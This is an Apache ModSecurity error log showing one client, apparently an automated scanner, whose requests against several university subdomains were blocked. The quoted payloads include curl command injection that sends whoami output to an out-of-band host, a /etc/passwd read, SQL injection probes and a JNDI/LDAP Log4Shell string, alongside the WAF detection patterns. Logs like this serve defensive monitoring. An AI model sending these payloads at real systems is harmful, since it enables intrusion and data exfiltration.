[Tue Aug 29 11:31:32.363423 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:User. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:User:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10pMCo-f0AAAQMrr4AAAAu"]
[Tue Aug 29 11:31:32.364434 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:User. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:User:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10pMCo-f0AAAQEGJUAAAAm"]
[Tue Aug 29 11:31:32.383117 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:User. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:User:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10pMCo-f0AAAQMrr8AAAAu"]
[Tue Aug 29 11:31:33.368290 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:iface. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:iface: ;curl cjmn8l5jmimk2adbbnlgezdwmeecz3onj.oast.site/`whoami`;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/ajax/networking/get_netcfg.php"] [unique_id "ZO10pcCo-f0AAAQMrsEAAAAu"]
[Tue Aug 29 11:31:33.368695 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:iface. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:iface: ;curl cjmn8l5jmimk2adbbnlgxi9ztg8dtzbi5.oast.site/`whoami`;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ajax/networking/get_netcfg.php"] [unique_id "ZO10pcCo-f0AAAPah0EAAAAL"]
[Tue Aug 29 11:31:33.370532 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:iface. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:iface: ;curl cjmn8l5jmimk2adbbnlghtx1hiuxbsj44.oast.site/`whoami`;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/ajax/networking/get_netcfg.php"] [unique_id "ZO10pcCo-f0AAAP@MzgAAAAZ"]
[Tue Aug 29 11:31:33.384399 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:User. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:User:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10pcCo-f0AAAQKOcEAAAAs"]
[Tue Aug 29 11:31:33.423251 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO10pcCo-f0AAAQMrsIAAAAu"]
[Tue Aug 29 11:31:33.457025 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO10pcCo-f0AAAQJWtoAAAAr"]
[Tue Aug 29 11:31:33.541642 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:iface. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:iface: ;curl cjmn8l5jmimk2adbbnlg4gbppqejqoph6.oast.site/`whoami`;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/ajax/networking/get_netcfg.php"] [unique_id "ZO10pcCo-f0AAAPah0MAAAAL"]
[Tue Aug 29 11:31:33.612812 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO10pcCo-f0AAAN@5GEAAAAO"]
[Tue Aug 29 11:31:33.617634 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:iface. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:iface: ;curl cjmn8l5jmimk2adbbnlg4tpgbkc5u44e3.oast.site/`whoami`;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/ajax/networking/get_netcfg.php"] [unique_id "ZO10pcCo-f0AAAQKOcYAAAAs"]
[Tue Aug 29 11:31:33.652875 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO10pcCo-f0AAAQEGJ0AAAAm"]
[Tue Aug 29 11:31:33.653712 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO10pcCo-f0AAAN@5GIAAAAO"]
[Tue Aug 29 11:31:34.308213 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param: 1' and updatexml(1,concat(0x7e,(SELECT md5(999999999)),0x7e),1)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/api/sms_check.php"] [unique_id "ZO10psCo-f0AAAQJWuYAAAAr"]
[Tue Aug 29 11:31:34.308470 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param: 1' and updatexml(1,concat(0x7e,(SELECT md5(999999999)),0x7e),1)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/api/sms_check.php"] [unique_id "ZO10psCo-f0AAAQMrssAAAAu"]
[Tue Aug 29 11:31:34.379240 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param: 1' and updatexml(1,concat(0x7e,(SELECT md5(999999999)),0x7e),1)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/api/sms_check.php"] [unique_id "ZO10psCo-f0AAAQkBVoAAAAC"]
[Tue Aug 29 11:31:34.380131 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param: 1' and updatexml(1,concat(0x7e,(SELECT md5(999999999)),0x7e),1)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/api/sms_check.php"] [unique_id "ZO10psCo-f0AAAQEGKUAAAAm"]
[Tue Aug 29 11:31:34.422454 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:iface. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:iface: ;curl cjmn8l5jmimk2adbbnlg533w7qdunpfsh.oast.site/`whoami`;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/ajax/networking/get_netcfg.php"] [unique_id "ZO10psCo-f0AAAN@5GYAAAAO"]
[Tue Aug 29 11:31:34.552408 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param: 1' and updatexml(1,concat(0x7e,(SELECT md5(999999999)),0x7e),1)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/sms_check.php"] [unique_id "ZO10psCo-f0AAAP@M0MAAAAZ"]
[Tue Aug 29 11:31:35.316619 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param: 1' and updatexml(1,concat(0x7e,(SELECT md5(999999999)),0x7e),1)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/api/sms_check.php"] [unique_id "ZO10p8Co-f0AAAQMrtUAAAAu"]
[Tue Aug 29 11:31:35.331915 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO10p8Co-f0AAAN@5GgAAAAO"]
[Tue Aug 29 11:31:35.395261 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO10p8Co-f0AAAQMrtYAAAAu"]
[Tue Aug 29 11:31:35.397119 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO10p8Co-f0AAAPah0sAAAAL"]
[Tue Aug 29 11:31:35.398099 2023] [:error] [pid 1061] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO10p8Co-f0AAAQlGQkAAAAF"]
[Tue Aug 29 11:31:35.414851 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO10p8Co-f0AAAQMrtcAAAAu"]
[Tue Aug 29 11:31:35.416923 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO10p8Co-f0AAAPah0wAAAAL"]
[Tue Aug 29 11:31:36.320889 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-808}${:-319}.${hostName}.username.cjmn8l5jmimk2adbbnlg6zi41ehbr3bse.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO10qMCo-f0AAAQkBWMAAAAC"]
